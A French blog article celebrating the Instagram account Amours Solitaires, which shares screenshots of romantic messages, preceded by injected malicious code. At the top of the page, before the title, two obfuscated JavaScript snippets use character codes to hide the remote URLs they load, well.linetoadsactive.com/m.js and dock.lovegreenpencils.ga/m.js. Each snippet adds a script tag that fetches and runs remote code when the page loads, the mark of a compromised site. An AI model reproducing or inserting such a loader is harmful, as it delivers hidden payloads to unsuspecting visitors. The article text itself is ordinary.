Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Instagram : L’amour est mort, vive Amours Solitaires ! -

Aujourd’hui, on vous emmène à la découverte du compte Instagram Amours Solitaires, ou : comment réhabiliter l’amour à la sauce 2.0 ?

Les plus sceptiques argueront que les millenials et autres générations Z, accros aux réseaux sociaux ne savent plus écrire. Pire, ne savent plus écrire, ou vivre, l’amour.
Fini les déclarations sous le balcon et les lettres d’amour enflammées… Georges Sand, Alfred de Musset, où êtes vous ?

Et bien, peut être plus près que ce qu’on pourrait croire… Morgane Ortin, (la révolutionnaire de l’amour derrière le joli compte Amours Solitaires) a fait le pari fou de, rendre leur lettres de noblesses aux sentiments les plus doux à l’air du froid digital.

Le principe d’ Amours Solitaires:

Via le site amours-solitaires.com, chacun peut envoyer les captures d’écrans des plus beaux messages reçus et/ou envoyés. A la suite de quoi, Morgane sélectionne ses coups de coeurs et les partages avec la communauté d’amoureux solitaires qui la suit assidûment.

Le but de tout ça ? : Montrer qu’en 2018 la passion existe encore. En outre, que si les supports et les modes de transmission ont changés, le fond reste le même. On aime toujours follement et on le dit !

Avec Amours Solitaires c’est la « révolution de l’amour » qui est en marche ! Le partage de tous ces messages a, évidemment, vocation à plusieurs choses:

Premièrement, vous l’aurez compris, faire étalage des trésors qui se cachent dans nos téléphones, pour prouver que les rapports humains ne sont pas entièrement détachés et froids par écran interposés.

En deuxième lieu, rassembler une communauté bienveillante autour d’une même mouvance. Du reste, se balader sur ce feed, c’est trouver le courage qu’il nous manquait pour déclarer enfin sa flamme. Ou encore, l’inspiration pour faire le premier pas. Des mots à emprunter ou des maux à adoucir. On se rassure, en voyant que d’autres osent et on se sent soutenus quand on s’est enfin jeté à l’eau.

Et ça marche ! Car si les posts sont l’attraction principale, les commentaires ne sont pas en reste. Ici la communauté s’engage réellement. Chaque message publié génère des centaines de commentaires, sans compter les milliers de like. Chacun donne son avis, envoie de l’amour, du soutien. On se retrouve parfois à suivre de véritable feuilleton. Car accueilli dans l’intimité d’un couple, on est en suspens de concert avec l’expéditeur attendant une réponse. Réponse qui, quand elle arrive, ne manque pas d’être publiée sur Amours Solitaires, sous la demande pressante de tous les romantiques anonymes. Personne ne se moque, personne ne juge, tout le monde est le bienvenu. Couples hétérosexuels, homosexuels, polyamoureux… Le romantisme n’a ni couleur, ni genre, et c’est beau à voir !

En conclusion, si un soir (ou un matin, nous ne sommes pas sectaires) vous sentez que votre foi en l’humanité est dangereusement au plus bas… Faites comme nous ! Installez vous tranquillement dans un fauteuil avec un verre de vin (ou une tasse de thé, on est toujours pas sectaires). Et laissez vous emporter par le flot de douceur qui coule de ce compte Instagram d’un nouveau genre.

La révolution de l’amour, on est pour !